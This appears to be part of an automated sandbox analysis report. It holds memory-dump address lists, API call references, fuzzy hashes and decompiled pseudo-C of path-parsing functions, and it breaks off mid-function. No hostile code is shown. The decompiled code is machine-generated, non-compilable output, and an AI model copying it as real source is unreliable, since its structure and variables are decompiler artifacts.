                                0x4a565fc0
                                0x4a565fc0
                                0x4a565fc4
                                0x4a565fc5
                                0x4a565fce
                                0x4a565fcf
                                0x4a565fd5
                                0x4a565fe0
                                0x4a565fe4
                                0x4a565fe4
                                0x4a565fee
                                0x4a565ff5
                                0x4a560e73
                                0x4a560e76
                                0x4a55baf6
                                0x4a55bafd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a560e7c
                                0x00000000
                                0x4a560e76
                                0x4a55bad4
                                0x00000000
                                0x00000000
                                0x4a55bae1
                                0x4a55bae3
                                0x4a55baf0
                                0x4a5601f5
                                0x4a5601fb
                                0x4a5601fb
                                0x4a55baf0
                                0x00000000
                                0x4a55bae1
                                0x4a55ba5d
                                0x4a55ba1d
                                0x4a56602d
                                0x4a566032
                                0x4a566039
                                0x00000000
                                0x4a566039
                                0x4a560e39
                                0x4a565e93
                                0x4a565e9e
                                0x4a565eaa
                                0x4a565eac
                                0x4a565eac
                                0x00000000
                                0x4a565eaa
                                0x00000000
                                0x4a565e9e
                                0x4a560e3f
                                0x4a560e58
                                0x4a560e60
                                0x00000000
                                0x4a560e60
                                0x4a55b933
                                0x00000000
                                0x00000000
                                0x4a55b93d
                                0x4a55b944
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,00000002,00000104,?,?,00000000,?,00000104,?,00000002,00000104,?,?), ref: 4A55BA15
                                • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,?,00000000), ref: 4A55BA55
                                • GetLastError.KERNEL32(?,00000000), ref: 4A560E67
                                • _wcsicmp.MSVCRT ref: 4A565FF5
                                  • Part of subcall function 4A55BBA4: GetFileAttributesW.KERNEL32(00000000,00000104,?), ref: 4A55BC05
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FullNamePath$AttributesErrorFileLast_wcsicmp
                                • String ID: %9d$%s
                                • API String ID: 133037402-3662383364
                                • Opcode ID: c22c78739d1aad6171d4f590dac4b5e1bf7d47b0558a2cb19fb09e63c28b2024
                                • Instruction ID: 78908efee0f075c14fdbe02217bd5196d4b89d3b5edf1f518907d89b5b0b2c69
                                • Opcode Fuzzy Hash: c22c78739d1aad6171d4f590dac4b5e1bf7d47b0558a2cb19fb09e63c28b2024
                                • Instruction Fuzzy Hash: F5D107B1900119EADF219B60CE44BEE77B9EFA8310F0104E6E509EB049EB75DF84CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A557607, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 322COMMON
                                Download Yara Rule
                                C-Code - Quality: 67%
                                			E4A557607(void* __eax, void* __ebx, signed int __edx, WCHAR* __edi, WCHAR* __esi) {
				signed int _t169;
				WCHAR* _t172;
				WCHAR* _t173;
				long _t188;
				WCHAR* _t195;
				WCHAR* _t198;
				signed char _t199;
				signed int _t206;
				short _t229;
				short _t248;
				short _t252;
				short* _t253;
				WCHAR* _t256;
				short* _t261;
				WCHAR* _t262;
				WCHAR* _t270;
				void* _t272;
				WCHAR* _t273;
				void* _t278;
				short _t303;
				signed int _t314;
				signed int _t319;
				WCHAR* _t320;
				void* _t321;
				void* _t325;
				WCHAR* _t326;
				WCHAR* _t330;
				void* _t331;
				WCHAR* _t339;
				WCHAR* _t342;
				wchar_t* _t347;
				signed int _t349;
				void* _t351;

				L0:
				while(1) {
					L0:
					_t330 = __esi;
					_t320 = __edi;
					_t317 = __edx;
					if(__eax == 0x24) {
						goto L19;
					}
					L9:
					 *__ebx(__eax) = __ax & 0x0000ffff;
					__eax =  *__edi(L"fdpnxsatz", __ax & 0x0000ffff);
					__esp = __esp + 0xc;
					__eflags = __eax;
					if(__eax == 0) {
						goto L19;
					}
					L10:
					__eax =  *__esi & 0x0000ffff;
					__eax =  *__edi( *((intOrPtr*)(__ebp - 0x840)),  *__esi & 0x0000ffff);
					_pop(__ecx);
					_pop(__ecx);
					__eflags = __eax;
					if(__eax != 0) {
						__eax =  *(__ebp - 0x828);
						 *(__ebp - 0x848) = __esi;
						 *(__ebp - 0x834) =  *(__ebp - 0x828);
					}
					__eax =  *__esi & 0x0000ffff;
					__eax =  *__ebx( *__esi & 0x0000ffff);
					__eax = __ax & 0x0000ffff;
					__eflags = __eax - 0x70;
					_pop(__ecx);
					if(__eflags > 0) {
						L59:
						__eax = __eax - 0x73;
						__eflags = __eax;
						if(__eax == 0) {
							L77:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008020;
							goto L18;
						}
						L60:
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax == 0) {
							L76:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00004200;
							goto L18;
						}
						L61:
						__eax = __eax - 4;
						__eflags = __eax;
						if(__eax != 0) {
							L74:
							__eax = __eax - 1;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								goto L67;
							}
							L75:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00004400;
							goto L18;
						}
						L62:
						 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008010;
						goto L18;
					} else {
						L12:
						if(__eflags == 0) {
							L57:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008004;
							L18:
							_t330 =  &(_t330[1]);
							__eflags =  *_t330 & 0x0000ffff;
							if(( *_t330 & 0x0000ffff) != 0) {
								continue;
							}
							goto L19;
						}
						L13:
						__eax = __eax - 0x61;
						__eflags = __eax;
						if(__eax == 0) {
							L73:
							 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00004100;
							goto L18;
						}
						L14:
						__eax = __eax - 3;
						__eflags = __eax;
						if(__eax == 0) {
							L56:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008002;
							goto L18;
						}
						L15:
						__eax = __eax - 1;
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax == 0) {
							L65:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008001;
							goto L18;
						}
						L16:
						__eax = __eax - 8;
						__eflags = __eax;
						if(__eax != 0) {
							L67:
							__eflags =  *(_t349 - 0x830);
							if( *(_t349 - 0x830) == 0) {
								L69:
								_t173 = 0;
								L3:
								_pop(_t321);
								_pop(_t331);
								_pop(_t272);
								return E4A5513A9(_t173, _t272,  *(_t349 - 4) ^ _t349, _t317, _t321, _t331);
							}
							L68:
							E4A556D44(_t278, 0x400023a8, 1,  *((intOrPtr*)(_t349 - 0x844)));
							_t351 = _t351 + 0xc;
							L83:
							__imp__longjmp( *(_t349 - 0x830), 0xffffffff);
							goto L73;
						} else {
							_t4 = __ebp - 0x828;
							 *_t4 =  *(__ebp - 0x828) | 0x00008008;
							__eflags =  *_t4;
							goto L18;
						}
					}
					L19:
					_t169 =  *_t330 & 0x0000ffff;
					 *(_t349 - 0x838) =  *(_t349 - 0x838) & 0x00000000;
					__eflags = _t169;
					if(_t169 == 0) {
						L63:
						_t330 =  *(_t349 - 0x848);
						 *(_t349 - 0x828) =  *(_t349 - 0x834);
						L22:
						_t172 =  *_t320( *((intOrPtr*)(_t349 - 0x840)),  *_t330 & 0x0000ffff);
						_pop(_t278);
						__eflags = _t172;
						if(_t172 == 0) {
							goto L67;
						}
						L23:
						_t320 =  *( *(_t349 - 0x83c) + (_t172 -  *((intOrPtr*)(_t349 - 0x840)) >> 1) * 4);
						__eflags = _t320;
						if(_t320 == 0) {
							L26:
							 *( *(_t349 - 0x84c)) = (_t330 -  *((intOrPtr*)(_t349 - 0x844)) + 2 >> 1) - 1;
							__eflags = _t320;
							if(_t320 == 0) {
								L4:
								__eflags =  *( *(_t349 - 0x84c));
								_t173 = E4A553AFC;
								if( *( *(_t349 - 0x84c)) == 0) {
									L2:
									_t173 = _t320;
								}
								goto L3;
							}
							L27:
							__eflags =  *_t320;
							if( *_t320 == 0) {
								L1:
								if(_t320 == 0) {
									goto L4;
								}
								goto L2;
							}
							L28:
							__eflags =  *(_t349 - 0x828) & 0x0000c000;
							if(( *(_t349 - 0x828) & 0x0000c000) == 0) {
								L58:
								_push(_t320);
								L49:
								_t320 = E4A5519D6();
								goto L1;
							}
							L29:
							 *(_t349 - 0x824) = 0;
							__eflags =  *(_t349 - 0x838);
							if( *(_t349 - 0x838) != 0) {
								L87:
								__eflags =  *(_t349 - 0x838) - 0xffffffff;
								if( *(_t349 - 0x838) == 0xffffffff) {
									L91:
									_t320 = 0;
									goto L31;
								}
								L88:
								_t256 = SearchPathW( *(_t349 - 0x838), _t320, 0, 0x208, _t349 - 0x824, _t349 - 0x82c);
								 *(_t349 - 0x850) = _t256;
								__eflags = _t256;
								if(_t256 == 0) {
									goto L91;
								}
								L89:
								__eflags =  *(_t349 - 0x828);
								if( *(_t349 - 0x828) == 0) {
									 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00008001;
								}
								goto L31;
							} else {
								 *(_t349 - 0x850) = GetFullPathNameW(_t320, 0x208, _t349 - 0x824, _t349 - 0x82c);
								L31:
								 *(_t349 - 0x834) =  *(_t349 - 0x828) & 0x00000020;
								E4A556E47(_t349 - 0x824, 0x208,  *(_t349 - 0x828) & 0x00000020);
								_t188 = wcsrchr(_t349 - 0x824, 0x5c);
								 *(_t349 - 0x82c) = _t188;
								__eflags = _t188;
								if(_t188 == 0) {
									 *(_t349 - 0x82c) = wcsrchr(_t349 - 0x824, _t188);
								} else {
									_t29 = _t349 - 0x82c;
									 *_t29 =  &(( *(_t349 - 0x82c))[0]);
									__eflags =  *_t29;
								}
								__eflags =  *(_t349 - 0x850);
								if( *(_t349 - 0x850) == 0) {
									goto L1;
								} else {
									L34:
									 *(_t349 - 0x414) = 0;
									memset(_t349 - 0x412, 0, 0x40e);
									_t195 =  *(_t349 - 0x828) & 0x00004000;
									__eflags = _t195;
									_t339 = _t349 - 0x414;
									 *(_t349 - 0x83c) = _t195;
									_t325 = 0x207;
									if(_t195 != 0) {
										L93:
										_t198 = GetFileAttributesExW(_t349 - 0x824, 0, _t349 - 0x878);
										__eflags = _t198;
										if(_t198 == 0) {
											goto L35;
										}
										L94:
										__eflags =  *(_t349 - 0x828) & 0x00000100;
										if(( *(_t349 - 0x828) & 0x00000100) == 0) {
											L102:
											__eflags =  *(_t349 - 0x828) & 0x00000200;
											if(( *(_t349 - 0x828) & 0x00000200) != 0) {
												E4A562513(_t349 - 0x864, _t349 - 0x89c);
												__eflags = _t339 - _t349 - 0x414;
												if(_t339 != _t349 - 0x414) {
													__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
													if(_t339 - _t349 - 0x414 >> 1 < _t325) {
														_t252 = 0x20;
														 *_t339 = _t252;
														_t339 =  &(_t339[1]);
														__eflags = _t339;
													}
												}
												_t342 =  &(_t339[E4A56270D(_t349 - 0x89c, 0, _t339, 0x104 - (_t339 - _t349 - 0x414 >> 1))]);
												__eflags = _t342 - _t349 - 0x414;
												if(_t342 != _t349 - 0x414) {
													__eflags = _t342 - _t349 - 0x414 >> 1 - 0x207;
													if(_t342 - _t349 - 0x414 >> 1 < 0x207) {
														_t248 = 0x20;
														 *_t342 = _t248;
														_t342 =  &(_t342[1]);
														__eflags = _t342;
													}
												}
												__eflags = 0x104 - (_t342 - _t349 - 0x414 >> 1);
												_t339 =  &(_t342[E4A55D701(_t342, _t349 - 0x89c, 0, _t342, 0x104 - (_t342 - _t349 - 0x414 >> 1))]);
												_t325 = 0x207;
											}
											__eflags =  *(_t349 - 0x828) & 0x00000400;
											if(( *(_t349 - 0x828) & 0x00000400) != 0) {
												__eflags = _t339 - _t349 - 0x414;
												if(_t339 != _t349 - 0x414) {
													__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
													if(_t339 - _t349 - 0x414 >> 1 < _t325) {
														_t229 = 0x20;
														 *_t339 = _t229;
														_t339 =  &(_t339[1]);
														__eflags = _t339;
													}
												}
												 *((intOrPtr*)(_t349 - 0x854)) =  *((intOrPtr*)(_t349 - 0x858));
												 *(_t349 - 0x850) =  *(_t349 - 0x85c);
												_t339 =  &(_t339[E4A56292F(0, _t349 - 0x854, 0, _t339, 0x208 - (_t339 - _t349 - 0x414 >> 1))]);
											}
											goto L35;
										}
										L95:
										_t314 = 0;
										__eflags =  *0x4a59088c - _t314; // 0x64
										if(__eflags == 0) {
											goto L102;
										}
										L96:
										_t253 = 0x4a59088c;
										while(1) {
											L97:
											_t317 = _t314 >> 1;
											__eflags = _t314 >> 1 - _t325;
											if(_t314 >> 1 >= _t325) {
												goto L102;
											}
											L98:
											_t319 =  *(_t349 - 0x878);
											__eflags =  *(_t253 - 4) & _t319;
											if(( *(_t253 - 4) & _t319) == 0) {
												_t317 = 0x2d;
											} else {
												_t317 =  *_t253;
											}
											 *_t339 = _t317;
											_t339 =  &(_t339[1]);
											_t253 = _t253 + 8;
											_t314 = _t314 + 2;
											__eflags =  *_t253;
											if( *_t253 != 0) {
												continue;
											} else {
												goto L102;
											}
										}
										goto L102;
									}
									L35:
									_t199 =  *(_t349 - 0x828);
									__eflags = _t199 & 0x00008000;
									if((_t199 & 0x00008000) == 0) {
										L115:
										__eflags =  *(_t349 - 0x83c);
										if( *(_t349 - 0x83c) == 0) {
											goto L36;
										}
										L116:
										L48:
										_push(_t349 - 0x414);
										goto L49;
									}
									L36:
									__eflags = _t339 - _t349 - 0x414;
									if(_t339 != _t349 - 0x414) {
										_t317 = _t349 - 0x414;
										__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
										if(_t339 - _t349 - 0x414 >> 1 < _t325) {
											_t303 = 0x20;
											 *_t339 = _t303;
											_t339 =  &(_t339[1]);
										}
									}
									__eflags = _t199 & 0x00000001;
									if((_t199 & 0x00000001) != 0) {
										L47:
										__eflags = 0x208 - (_t339 - _t349 - 0x414 >> 1);
										E4A55185A(_t339, 0x208 - (_t339 - _t349 - 0x414 >> 1), _t349 - 0x824);
										goto L48;
									} else {
										L38:
										__eflags =  *(_t349 - 0x834);
										if( *(_t349 - 0x834) != 0) {
											L70:
											__eflags = _t199 & 0x0000001e;
											if((_t199 & 0x0000001e) != 0) {
												goto L39;
											}
											L71:
											goto L47;
										}
										L39:
										_t326 = _t349 - 0x820;
										__eflags = _t199 & 0x00000002;
										if((_t199 & 0x00000002) == 0) {
											E4A55185A(_t349 - 0x824, 0x208, _t326);
											_t48 = _t349 - 0x82c;
											 *_t48 =  *(_t349 - 0x82c) - 4;
											__eflags =  *_t48;
											_t326 = _t349 - 0x824;
										}
										L41:
										__eflags =  *(_t349 - 0x828) & 0x00000004;
										if(( *(_t349 - 0x828) & 0x00000004) == 0) {
											__eflags = 0x208 - (_t326 - _t349 - 0x824 >> 1);
											E4A55185A(_t326, 0x208 - (_t326 - _t349 - 0x824 >> 1),  *(_t349 - 0x82c));
											 *(_t349 - 0x82c) = _t326;
										}
										L43:
										_t206 = wcsrchr( *(_t349 - 0x82c), 0x2e);
										__eflags = _t206;
										if(_t206 == 0) {
											 *(_t349 - 0x83c) =  *(_t349 - 0x83c) & _t206;
											_t206 = _t349 - 0x83c;
										}
										__eflags =  *(_t349 - 0x828) & 0x00000010;
										if(( *(_t349 - 0x828) & 0x00000010) == 0) {
											__eflags = 0;
											 *_t206 = 0;
										}
										__eflags =  *(_t349 - 0x828) & 0x00000008;
										if(( *(_t349 - 0x828) & 0x00000008) == 0) {
											E4A55185A( *(_t349 - 0x82c), 0x208 - ( *(_t349 - 0x82c) - _t349 - 0x824 >> 1), _t206);
										}
										goto L47;
									}
								}
							}
						}
						L24:
						__eflags =  *_t320 - 0x22;
						if( *_t320 == 0x22) {
							L6:
							_t320 = E4A5519D6( &(_t320[1]));
							__eflags = _t320;
							if(_t320 == 0) {
								L80:
								__eflags =  *(_t349 - 0x830);
								if( *(_t349 - 0x830) != 0) {
									goto L83;
								}
								L81:
								goto L69;
							} else {
								_t261 = E4A552ED1(_t320);
								__eflags =  *_t261 - 0x22;
								if( *_t261 == 0x22) {
									 *_t261 = 0;
								}
								goto L26;
							}
						}
						L25:
						__eflags =  *_t330 - 0x30;
						if( *_t330 == 0x30) {
							_t262 =  *0x4a5740b4; // 0x0
							__eflags = _t262;
							if(_t262 != 0) {
								__eflags = _t262[0x46] - _t320;
								if(_t262[0x46] == _t320) {
									__eflags =  *(_t349 - 0x838);
									if( *(_t349 - 0x838) == 0) {
										__eflags =  *(_t349 - 0x828) & 0x0000c000;
										if(( *(_t349 - 0x828) & 0x0000c000) != 0) {
											_t320 =  *_t262;
										}
									}
								}
							}
						}
						goto L26;
					}
					L20:
					__eflags = _t169 - 0x24;
					if(_t169 == 0x24) {
						L78:
						_t347 =  &(_t330[1]);
						 *(_t349 - 0x834) = _t347;
						_t330 = wcschr(_t347, 0x3a);
						_pop(_t278);
						__eflags = _t330;
						if(_t330 == 0) {
							goto L67;
						}
						L79:
						_t320 = (_t330 -  *(_t349 - 0x834) >> 1) + 1;
						_t273 = E4A551896(_t320 + _t320);
						__eflags = _t273;
						if(_t273 != 0) {
							L84:
							E4A554B3D(_t273, _t320,  *(_t349 - 0x834), _t320 - 1);
							 *(_t349 - 0x838) = E4A55321B(_t278, _t273);
							E4A55142E(_t273);
							__eflags =  *(_t349 - 0x838);
							if( *(_t349 - 0x838) == 0) {
								_t113 = _t349 - 0x838;
								 *_t113 =  *(_t349 - 0x838) | 0xffffffff;
								__eflags =  *_t113;
							}
							_t320 = wcsrchr;
							_t330 =  &(_t330[1]);
							 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00008000;
							goto L22;
						}
						goto L80;
					}
					L21:
					_t270 =  *_t320( *((intOrPtr*)(_t349 - 0x840)), _t169);
					__eflags = _t270;
					if(_t270 == 0) {
						goto L63;
					}
					goto L22;
				}
			}




































                                0x4a557607
                                0x4a557607
                                0x4a557607
                                0x4a557607
                                0x4a557607
                                0x4a557607
                                0x4a55760b
                                0x00000000
                                0x00000000
                                0x4a55760d
                                0x4a557610
                                0x4a557619
                                0x4a55761b
                                0x4a55761e
                                0x4a557620
                                0x00000000
                                0x00000000
                                0x4a557622
                                0x4a557622
                                0x4a55762c
                                0x4a55762e
                                0x4a55762f
                                0x4a557630
                                0x4a557632
                                0x4a55fd30
                                0x4a55fd36
                                0x4a55fd3c
                                0x4a55fd3c
                                0x4a557638
                                0x4a55763c
                                0x4a55763e
                                0x4a557641
                                0x4a557644
                                0x4a557645
                                0x4a55fcf1
                                0x4a55fcf1
                                0x4a55fcf1
                                0x4a55fcf4
                                0x4a566c03
                                0x4a566c03
                                0x00000000
                                0x4a566c03
                                0x4a55fcfa
                                0x4a55fcfa
                                0x4a55fcfa
                                0x4a55fcfb
                                0x4a566bf4
                                0x4a566bf4
                                0x00000000
                                0x4a566bf4
                                0x4a55fd01
                                0x4a55fd01
                                0x4a55fd01
                                0x4a55fd04
                                0x4a566bdd
                                0x4a566bdd
                                0x4a566bde
                                0x4a566bde
                                0x4a566bdf
                                0x00000000
                                0x00000000
                                0x4a566be5
                                0x4a566be5
                                0x00000000
                                0x4a566be5
                                0x4a55fd0a
                                0x4a55fd0a
                                0x00000000
                                0x4a55764b
                                0x4a55764b
                                0x4a55764b
                                0x4a557990
                                0x4a557990
                                0x4a55767e
                                0x4a55767f
                                0x4a557683
                                0x4a557686
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a557686
                                0x4a557651
                                0x4a557651
                                0x4a557651
                                0x4a557654
                                0x4a566bce
                                0x4a566bce
                                0x00000000
                                0x4a566bce
                                0x4a55765a
                                0x4a55765a
                                0x4a55765a
                                0x4a55765d
                                0x4a557981
                                0x4a557981
                                0x00000000
                                0x4a557981
                                0x4a557663
                                0x4a557663
                                0x4a557664
                                0x4a557664
                                0x4a557665
                                0x4a55fd47
                                0x4a55fd47
                                0x00000000
                                0x4a55fd47
                                0x4a55766b
                                0x4a55766b
                                0x4a55766b
                                0x4a55766e
                                0x4a562374
                                0x4a562374
                                0x4a56237b
                                0x4a562382
                                0x4a562382
                                0x4a5551bc
                                0x4a5551bf
                                0x4a5551c0
                                0x4a5551c3
                                0x4a5551ca
                                0x4a5551ca
                                0x4a56237d
                                0x4a566c64
                                0x4a566c69
                                0x4a566c6c
                                0x4a566bc8
                                0x00000000
                                0x4a557674
                                0x4a557674
                                0x4a557674
                                0x4a557674
                                0x00000000
                                0x4a557674
                                0x4a55766e
                                0x4a55768c
                                0x4a55768c
                                0x4a55768f
                                0x4a557696
                                0x4a557699
                                0x4a55fd19
                                0x4a55fd1f
                                0x4a55fd25
                                0x4a5576bc
                                0x4a5576c6
                                0x4a5576c9
                                0x4a5576ca
                                0x4a5576cc
                                0x00000000
                                0x00000000
                                0x4a5576d2
                                0x4a5576e0
                                0x4a5576e8
                                0x4a5576ea
                                0x4a557700
                                0x4a557711
                                0x4a557713
                                0x4a557715
                                0x4a555273
                                0x4a555279
                                0x4a55527c
                                0x4a555281
                                0x4a5551ba
                                0x4a5551ba
                                0x4a5551ba
                                0x00000000
                                0x4a555281
                                0x4a55771b
                                0x4a55771b
                                0x4a55771f
                                0x4a5551b2
                                0x4a5551b4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5551b4
                                0x4a557725
                                0x4a557725
                                0x4a55772b
                                0x4a55f3dc
                                0x4a55f3dc
                                0x4a5578d6
                                0x4a5578db
                                0x00000000
                                0x4a5578db
                                0x4a557731
                                0x4a557733
                                0x4a55773f
                                0x4a557745
                                0x4a566cc3
                                0x4a566cc3
                                0x4a566cca
                                0x4a566d10
                                0x4a566d10
                                0x00000000
                                0x4a566d10
                                0x4a566ccc
                                0x4a566ce4
                                0x4a566cea
                                0x4a566cf0
                                0x4a566cf2
                                0x00000000
                                0x00000000
                                0x4a566cf4
                                0x4a566cf4
                                0x4a566cfb
                                0x4a566d01
                                0x4a566d01
                                0x00000000
                                0x4a55774b
                                0x4a557761
                                0x4a557767
                                0x4a557771
                                0x4a55777f
                                0x4a557793
                                0x4a557797
                                0x4a55779d
                                0x4a55779f
                                0x4a566d23
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577ac
                                0x4a5577b3
                                0x00000000
                                0x4a5577b9
                                0x4a5577b9
                                0x4a5577c1
                                0x4a5577cf
                                0x4a5577dd
                                0x4a5577dd
                                0x4a5577e2
                                0x4a5577e8
                                0x4a5577ee
                                0x4a5577f3
                                0x4a566d2e
                                0x4a566d3e
                                0x4a566d44
                                0x4a566d46
                                0x00000000
                                0x00000000
                                0x4a566d4c
                                0x4a566d4c
                                0x4a566d56
                                0x4a566d93
                                0x4a566d93
                                0x4a566d9d
                                0x4a566db1
                                0x4a566dbc
                                0x4a566dbe
                                0x4a566dcc
                                0x4a566dce
                                0x4a566dd2
                                0x4a566dd3
                                0x4a566dd7
                                0x4a566dd7
                                0x4a566dd7
                                0x4a566dce
                                0x4a566dfd
                                0x4a566e06
                                0x4a566e08
                                0x4a566e16
                                0x4a566e1b
                                0x4a566e1f
                                0x4a566e20
                                0x4a566e24
                                0x4a566e24
                                0x4a566e24
                                0x4a566e1b
                                0x4a566e31
                                0x4a566e43
                                0x4a566e46
                                0x4a566e46
                                0x4a566e4b
                                0x4a566e55
                                0x4a566e61
                                0x4a566e63
                                0x4a566e71
                                0x4a566e73
                                0x4a566e77
                                0x4a566e78
                                0x4a566e7c
                                0x4a566e7c
                                0x4a566e7c
                                0x4a566e73
                                0x4a566e83
                                0x4a566e8f
                                0x4a566eb7
                                0x4a566eb7
                                0x00000000
                                0x4a566e55
                                0x4a566d58
                                0x4a566d58
                                0x4a566d5a
                                0x4a566d61
                                0x00000000
                                0x00000000
                                0x4a566d63
                                0x4a566d63
                                0x4a566d68
                                0x4a566d68
                                0x4a566d6a
                                0x4a566d6c
                                0x4a566d6e
                                0x00000000
                                0x00000000
                                0x4a566d70
                                0x4a566d70
                                0x4a566d76
                                0x4a566d79
                                0x4a566d82
                                0x4a566d7b
                                0x4a566d7b
                                0x4a566d7b
                                0x4a566d83
                                0x4a566d87
                                0x4a566d89
                                0x4a566d8c
                                0x4a566d8d
                                0x4a566d91
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a566d91
                                0x00000000
                                0x4a566d68
                                0x4a5577f9
                                0x4a5577f9
                                0x4a5577ff
                                0x4a557804
                                0x4a566ebf
                                0x4a566ebf
                                0x4a566ec6
                                0x00000000
                                0x00000000
                                0x4a566ecc
                                0x4a5578cf
                                0x4a5578d5
                                0x00000000
                                0x4a5578d5
                                0x4a55780a
                                0x4a557810
                                0x4a557812
                                0x4a566ed3
                                0x4a566edd
                                0x4a566edf
                                0x4a566ee7
                                0x4a566ee8
                                0x4a566eec
                                0x4a566eec
                                0x4a566edf
                                0x4a557818
                                0x4a55781a
                                0x4a5578b3
                                0x4a5578c6
                                0x4a5578ca
                                0x00000000
                                0x4a557820
                                0x4a557820
                                0x4a557820
                                0x4a557827
                                0x4a562389
                                0x4a562389
                                0x4a56238b
                                0x00000000
                                0x00000000
                                0x4a562391
                                0x00000000
                                0x4a562391
                                0x4a55782d
                                0x4a55782d
                                0x4a557833
                                0x4a557835
                                0x4a557842
                                0x4a557847
                                0x4a557847
                                0x4a557847
                                0x4a55784e
                                0x4a55784e
                                0x4a557854
                                0x4a557854
                                0x4a55785b
                                0x4a557871
                                0x4a557875
                                0x4a55787a
                                0x4a55787a
                                0x4a557880
                                0x4a557888
                                0x4a557890
                                0x4a557892
                                0x4a55fea7
                                0x4a55fead
                                0x4a55fead
                                0x4a557898
                                0x4a55789f
                                0x4a5578a1
                                0x4a5578a3
                                0x4a5578a3
                                0x4a5578a6
                                0x4a5578ad
                                0x4a557977
                                0x4a557977
                                0x00000000
                                0x4a5578ad
                                0x4a55781a
                                0x4a5577b3
                                0x4a557745
                                0x4a5576ec
                                0x4a5576ec
                                0x4a5576f0
                                0x4a556c46
                                0x4a556c4f
                                0x4a556c51
                                0x4a556c53
                                0x4a566c49
                                0x4a566c49
                                0x4a566c50
                                0x00000000
                                0x00000000
                                0x4a566c52
                                0x00000000
                                0x4a556c59
                                0x4a556c5a
                                0x4a556c5f
                                0x4a556c63
                                0x4a556c6b
                                0x4a556c6b
                                0x00000000
                                0x4a556c63
                                0x4a556c53
                                0x4a5576f6
                                0x4a5576f6
                                0x4a5576fa
                                0x4a557922
                                0x4a557927
                                0x4a557929
                                0x4a55792f
                                0x4a557935
                                0x4a55793b
                                0x4a557942
                                0x4a557948
                                0x4a55794e
                                0x4a557954
                                0x4a557954
                                0x4a55794e
                                0x4a557942
                                0x4a557935
                                0x4a557929
                                0x00000000
                                0x4a5576fa
                                0x4a55769f
                                0x4a55769f
                                0x4a5576a3
                                0x4a566c12
                                0x4a566c13
                                0x4a566c17
                                0x4a566c23
                                0x4a566c26
                                0x4a566c27
                                0x4a566c29
                                0x00000000
                                0x00000000
                                0x4a566c2f
                                0x4a566c39
                                0x4a566c43
                                0x4a566c45
                                0x4a566c47
                                0x4a566c79
                                0x4a566c85
                                0x4a566c91
                                0x4a566c97
                                0x4a566c9c
                                0x4a566ca3
                                0x4a566ca5
                                0x4a566ca5
                                0x4a566ca5
                                0x4a566ca5
                                0x4a566cac
                                0x4a566cb3
                                0x4a566cb4
                                0x00000000
                                0x4a566cb4
                                0x00000000
                                0x4a566c47
                                0x4a5576a9
                                0x4a5576b0
                                0x4a5576b4
                                0x4a5576b6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5576b6

                                APIs
                                • GetFullPathNameW.KERNEL32(00000000,00000208,?,?,00000000), ref: 4A55775B
                                • wcsrchr.MSVCRT ref: 4A557793
                                • memset.MSVCRT ref: 4A5577CF
                                • wcsrchr.MSVCRT ref: 4A557888
                                • longjmp.MSVCRT(00004002,000000FF,00000025,00000000,4A574AC0), ref: 4A566BC8
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcsrchr$FullNamePathlongjmpmemset
                                • String ID: fdpnxsatz
                                • API String ID: 878463284-1106894203
                                • Opcode ID: c8ade769e8c9b0d218358da102e2936ee49411d8076f5a743fc9a91f618c4fca
                                • Instruction ID: 5037e958dda67d80d4c731ccef8debad62a14d059f1525a739875c360e0683d3
                                • Opcode Fuzzy Hash: c8ade769e8c9b0d218358da102e2936ee49411d8076f5a743fc9a91f618c4fca
                                • Instruction Fuzzy Hash: 98C1E0B1901229DAEF649A24CE447A97BF8FF44320F1185DAD589E618CDF319AC4CFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022D0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E022D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
